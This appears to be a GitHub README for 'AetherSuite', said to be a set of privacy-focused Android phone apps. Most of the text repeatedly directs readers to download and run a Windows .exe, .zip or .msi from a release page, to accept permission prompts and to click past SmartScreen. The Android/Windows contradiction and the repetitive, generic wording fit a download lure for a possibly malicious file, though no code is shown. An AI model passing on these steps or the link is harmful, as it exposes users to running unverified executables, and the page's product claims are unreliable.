AetherSuite is a set of 9 Android apps that replace the default apps on your phone.
It includes tools for:
- Messages
- Contacts
- Calendar
- Notes
- Music
- Gallery
- File management
- SMS
- Privacy-first use
Each app keeps your data on your device. It does not use ads or tracking.
Visit the release page to download and run this app on Windows:
https://github.com/adriaensrighthanded591/AetherSuite/releases
On that page, look for the latest release and download the Windows file.
- Open the release page link above.
- Find the latest version near the top of the page.
- Under Assets, download the Windows file.
- Save the file to a folder you can find, like Downloads or Desktop.
- If the file is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to start it.
If Windows asks for permission, choose Yes.
AetherSuite gives you a full set of daily phone apps in one place.
- Calendar for events and reminders
- Contacts for your address book
- Messages for day-to-day chat
- SMS for text messaging
- Notes for quick lists and ideas
- Music for local audio files
- Gallery for photos and videos
- File manager for browsing files
- Privacy tools for safer use
- Clean Material Design layout
- Simple navigation
- Fast startup
- Easy to use on a phone screen
- Built with Kotlin and Jetpack Compose
- No ads
- No tracking
- No account needed
- No cloud-first setup
- Private by design
Open AetherSuite and pick the app you need from the main screen.
- Use Contacts to save names, numbers, and email addresses
- Use Calendar to create events and set reminders
- Use Messages and SMS to read and send texts
- Use Notes to keep short text notes
- Use Gallery to view photos and videos
- Use Music to play songs stored on your device
- Use File Manager to move, open, and sort files
Each app is built for quick daily use.
If the app does not start right away:
- Make sure the file finished downloading
- Check that you extracted the ZIP file if it came in one
- Try opening the app from the extracted folder
- Keep the app in a folder with a simple name
- Close other heavy apps and try again
If Windows SmartScreen appears, choose the option to run the app if you trust the file source.
The release page may include:
- A Windows build
- Version notes
- Source code links
- Release files for other platforms
For Windows use, pick the latest release and download the file for your system.
AetherSuite is meant for standard consumer devices and runs on recent Windows setups used for Android app support.
Recommended setup:
- Windows 10 or Windows 11
- A modern 64-bit processor
- At least 4 GB of RAM
- Enough free space for the app files and your personal data
- A screen size that can show mobile-style app layouts clearly
AetherSuite fits people who want a simple set of daily apps without extra clutter.
You can use it to:
- Keep contacts in one place
- Track plans in a calendar
- Save notes fast
- Browse photos
- Play local music
- Manage files
- Send and read messages
- Keep your phone tools in one suite
AetherSuite focuses on local use.
That means:
- Your data stays on your device
- The apps do not show ads
- The apps do not follow your activity
- You do not need to create an account to start
You may see names like:
- AetherSuite
- Gallery
- Music
- Notes
- Contacts
- Calendar
- Messages
- SMS
- File Manager
These are the main parts of the suite and match the tools inside the app
The release page may give you one of these:
.exefor a direct Windows app.zipfor a compressed folder.msifor a Windows installer
If you download a ZIP file, extract it before opening the app
Use this link to visit the release page and download the latest Windows version:
https://github.com/adriaensrighthanded591/AetherSuite/releases
- Kotlin
- Jetpack Compose
- Material Design
- MVVM
- Open-source components
- AES-256 for secure data handling where used
This project is tagged for:
- android
- calendar
- contacts
- file-manager
- gallery
- messaging
- music
- notes
- privacy
- sms
Before you open AetherSuite for the first time:
- Download the latest release
- Extract the file if needed
- Open the app file
- Allow Windows permission prompts
- Check that the app window appears
- Open one of the built-in apps like Notes or Gallery
AetherSuite uses the MIT License
Place the app folder in a simple location such as:
- Downloads
- Desktop
- Documents
- A folder named AetherSuite
This makes it easier to open again later
AetherSuite works well when you want:
- One app set instead of many separate tools
- A cleaner phone-like layout
- A private setup without ad networks
- A simple way to manage core phone tasks
Latest Windows download: https://github.com/adriaensrighthanded591/AetherSuite/releases